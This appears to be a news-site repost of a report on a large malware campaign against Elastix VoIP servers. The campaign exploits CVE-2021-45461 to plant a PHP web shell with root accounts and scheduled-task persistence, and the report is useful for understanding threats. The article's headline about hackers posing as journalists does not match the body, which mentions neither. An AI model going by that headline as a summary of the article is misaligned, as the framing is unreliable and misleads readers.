Connect with us

Hi, what are you looking for?

Hard News Hard Hitting News Source Global Political News

Cyber Security

Hackers pose as journalists to further their espionage operations

Threat analysts have uncovered a large-scale campaign targeting Elastix VoIP telephony servers with more than 500,000 malware samples over a period of three months.

Elastix is a server software for unified communications (Internet Protocol Private Branch Exchange [IP PBX], email, instant messaging, faxing) that is used in the Digium phones module for FreePBX.

The attackers may have exploited a remote code excution (RCE) vulnerability identified as CVE-2021-45461, with a critical severity rating of 9.8 out of 10.

Adversaries have been exploiting this vulnerability since December 2021 and the recent campaign appears to be connected to the security issue.

Security researchers at Palo Alto Networks’ Unit 42 say that the attackers’ goal was to plant a PHP web shell that could run arbitrary commands on the compromised communications server.

In a report on Friday, the researchers say that the threat actor deployed “more than 500,000 unique malware samples of this family” between December 2021 and March 2022.

The campaign is still active and shares several similarities to another operation in 2020 that was reported by researchers at cybersecurity company Check Point.

Attack details

The researchers observed two attack groups using different initial exploitation scripts to drop a small-size shell script. The script installs the PHP backdoor on the target  device and also creates root user accounts and ensures persistence through scheduled tasks.

One of the two scripts used for initial compromise
One of the two scripts used for initial compromise (Palo Alto Networks)

“This dropper also tries to blend into the existing environment by spoofing the timestamp of the installed PHP backdoor file to that of a known file already on the system,” note the security researchers.

The IP addresses of the attackers from both groups are located in the Netherlands, while DNS records reveal links to several Russian adult sites. Currently, parts of the payload-delivery infrastructure remain online and operational.

The scheduled task created by the first script runs every minute to fetch a PHP web shell that is base64 encoded and can manage the following parameters in incoming web requests:

  • md5 – MD5 authentication hash for remote login and web shell interaction.
  • admin – Select between Elastic and Freepbx administrator session.
  • cmd – Run arbitrary commands remotely
  • call – Start a call from the Asterisk command line interface (CLI)

The web shell also features an additional set of eight built-in commands for file reading, directory listing, and reconnaissance of the Asterisk open-source PBX platform.

The report from Unit42 includes technical details on how the payloads are dropped and some tactics to avoid detection on the existing environment. Furthermore, a list of indicators of compromise reveals local file paths the malware uses, unique strings, hashes for shell scripts, and public URLs that host the payloads.

Source: https://www.bleepingcomputer.com/news/security/massive-campaign-hits-elastix-voip-systems-with-500-000-unique-malware-samples/

Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

You May Also Like

Cyber Security

North Korean state-sponsored hackers Lazarus Group have been exploiting a ManageEngine ServiceDesk vulnerability (CVE-2022-47966) to target internet backbone infrastructure and healthcare institutions in Europe...

Cyber Security

The Cyber Safety Review Board will assess how a hacking group reportedly linked to China leveraged a vulnerability in Microsoft Exchange Online to access...

Business News

DUBAI, United Arab Emirates (AP) — The United States and Iran reached a tentative agreement this week that will eventually see five detained Americans in Iran...

Business News

SAN DIEGO (AP) — Two U.S. Navy sailors were charged Thursday with providing sensitive military information to China — including details on wartime exercises,...

Copyright © 2023 Hard News Herd Hitting in Your Face News Source | World News | Breaking News | US News | Political News Website by Top Search SEO